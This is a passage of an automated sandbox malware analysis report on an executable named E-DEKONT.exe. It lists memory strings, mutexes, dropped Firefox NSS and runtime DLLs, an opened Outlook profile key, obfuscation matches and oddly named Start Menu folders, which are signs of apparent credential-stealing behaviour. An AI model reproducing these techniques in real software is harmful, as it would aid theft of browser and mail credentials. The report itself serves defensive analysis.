                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: SELECT ALL id FROM %s;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1668:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1668:304:WilStaging_02
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Mutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-705FBD2D-EEC696EC
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fivefoldness\Endosseringerne\Fouragen
                  Source: E-DEKONT.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945375034.000000001E7C4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108911467372.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr
                  Source: Binary string: mshtml.pdb source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp
                  Source: Binary string: ucrtbase.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944495518.000000001E78C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108913399205.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.4.dr

                  Data Obfuscation

                  Source: Yara match File source: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000004.00000000.108599370042.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_10002DE0 push eax; ret 1_2_10002E0E
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B6496D push ecx; ret 1_2_02B64ACF
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B640BB push ecx; ret 1_2_02B6409A
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B640BB push esi; retf 1_2_02B6410B
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B692E3 push FFFFFFB9h; retf 1_2_02B692EA
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B64A56 push ecx; ret 1_2_02B64ACF
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B64A4D push ecx; ret 1_2_02B64ACF
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B63FAF push ecx; ret 1_2_02B6409A
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B6638C push ss; iretd 1_2_02B6638E
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B63FEC push ecx; ret 1_2_02B6409A
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B62321 push ds; ret 1_2_02B62323
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B61517 push esp; retf 1_2_02B61519
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_02B63D57 pushfd ; iretd 1_2_02B63D58
                  Source: msvcp140.dll.4.dr Static PE information: section name: .didat
                  Source: C:\Users\user\Desktop\E-DEKONT.exe Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_10001B18
                  Source: api-ms-win-core-console-l1-1-0.dll.4.dr Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-time-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-stdio-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-debug-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\mozglue.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-handle-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-namedpipe-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-utility-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-locale-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-libraryloader-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-environment-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-convert-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l1-2-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-2-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\vcruntime140.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-runtime-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-timezone-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-string-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\nssdbm3.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-interlocked-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-datetime-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-filesystem-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-heap-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-conio-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-multibyte-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-string-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-file-l2-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\nss3.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\softokn3.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\ucrtbase.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\freebl3.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-heap-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-sysinfo-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-errorhandling-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-rtlsupport-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\msvcp140.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-math-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-localization-l1-2-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-private-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processthreads-l1-1-1.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-memory-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-crt-process-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-util-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\nsx82F6.tmp\System.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-processenvironment-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-synch-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-profile-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Local\Temp\75C649CD\api-ms-win-core-console-l1-1-0.dll
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Internalisere
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\Internalisere\Brnesangen.End
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\logicalization
                  Source: C:\Users\user\Desktop\E-DEKONT.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra\logicalization\libxml2-2.0.typelib
